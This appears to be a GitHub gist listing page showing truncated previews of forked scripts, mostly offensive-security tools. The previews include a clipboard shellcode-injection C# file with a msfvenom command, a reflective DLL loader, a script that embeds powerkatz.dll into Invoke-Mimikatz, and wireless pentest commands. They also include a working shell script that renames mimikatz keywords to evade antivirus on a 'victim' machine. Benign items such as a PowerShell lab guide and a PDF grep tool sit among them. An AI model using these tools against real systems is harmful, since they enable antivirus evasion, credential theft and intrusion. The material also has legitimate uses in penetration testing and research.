
johnjohnsp1 / PowerShellLab_Setup.md
Created Dec 12, 2021 — forked from jdhitsolutions/PowerShellLab_Setup.md
Detailed instructions for setting up the PowerShellLab for my Pluralsight courses.

PowerShell Lab Detailed Setup Instructions

For my Pluralsight PowerShell courses, you are welcome to use any lab environment you wish. It should include an Active Directory domain with at least a domain controller, a Windows 10 client, and a Windows Server 2016 or 2019 member server. You will need to modify the course files to fit your environment. At this point in time, Windows Server 2022 remains untested for my labs.

However, I am going to recommend that you use a free PowerShell module called PSAutoLab. I encourage you to look at the README document on the project's GitHub repository before proceeding. If you need help with the module or its commands, please use the repository's Issues section.

PSAutolab

Please refer to this document to assist in installing and setting up the PSAutolab module on your computer. Run all commands from an elevated Windows PowerShell

johnjohnsp1 / ClippyShellcodeInject.cs
Created Nov 25, 2021 — forked from Wra7h/ClippyShellcodeInject.cs
Clipboard Shellcode Injection
// Using the clipboard as your code cave.
// Generate your shellcode with msfvenom or whatever
// Example: msfvenom -p windows/x64/exec CMD=calc exitfunc=thread -f raw -o <outputfile.bin>
// Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\ClippyShellcodeInject.cs
using System;
using System.IO;
using System.Runtime.InteropServices;
namespace ClippySCInject
johnjohnsp1 / MDE_DataCollection_Scripts.md

Microsoft Defender for Endpoint does a great job of ensuring the integrity of the scripts they push and execute.

First, they ensure that the script to execute matches the expected file hash. Example:

powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command "& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7910.6064030.0.6552433-3a7d9fb541a03fc183f740777b7bb1aa20a20efd\046a3caf-d9ec-4da6-a32a-fb148992596a.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7910.6064030.0.6552433-3a7d9fb541a03fc183f740777b7bb1aa20a20efd\046a3caf-d9ec-4da6-a32a-fb148992596a.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'd871ab44a81b93cdf3c7e235c246ea8b4bf65d9141d7797270c15dd6bbdb2803'))
johnjohnsp1 / ISeeSharpProcess.cs
using System;
using System.Diagnostics;
namespace ISeeSharpProcess
{
class Program
{
// Port of https://gist.github.com/mubix/1536156f06633a54e7f1f819d7fa740a
static void GetCSharpProcess()
{
johnjohnsp1 / pdf-grep
Created Oct 16, 2020 — forked from ngregoire/pdf-grep
Grep through PDF files
#!/bin/bash
# Three arguments: ROOT_DIR, PATTERN, OPTIONS
# Search below $ROOT_DIR for PDF files matching $PATTERN
# $OPTIONS is passed to pdfgrep (ex: pdf-grep . 'some words' -h -C5)
# ROOT_DIR
if [ -z "$1" ]; then
echo "! Argument ROOT_DIR is needed!"
johnjohnsp1 / PsexecReflective.ps1
function reflectit
{
<#
.SYNOPSIS
This script has two modes. It can reflectively load a DLL/EXE into the PowerShell process,
or it can reflectively load a DLL into a remote process. These modes have different parameters and constraints;
please read the Notes section (GENERAL NOTES) for information on how to use them.
johnjohnsp1 / mimikatz_obfuscator.sh
# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ...,
# so removing them from the project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.
git clone https://github.com/gentilkiwi/mimikatz.git windows
mv windows/mimikatz windows/windows
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g'
johnjohnsp1 / Invoke-UpdateMimikatzScript.ps1
Created Jul 29, 2020 — forked from ihack4falafel/Invoke-UpdateMimikatzScript.ps1
Convert x64/x86 powerkatz.dll to Base64 string and then update Invoke-Mimikatz.ps1 script from Empire
<#
.Synopsis
Invoke-UpdateMimikatzScript created by Hashim Jawad (@ihack4falafel)
.DESCRIPTION
Convert x64/x86 powerkatz.dll to Base64 string and then update Invoke-Mimikatz.ps1 script from Empire, see the link https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1
.PARAMETER DllPath
Path to powerkatz.dll generated via Visual Studio.
.PARAMETER ScriptPath
Path to Invoke-Mimikatz.ps1 script.
johnjohnsp1 / Wireless Penetration Testing Cheat Sheet.md

# Wireless Penetration Testing Cheat Sheet

## WIRELESS ANTENNA

* Enable monitor mode
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up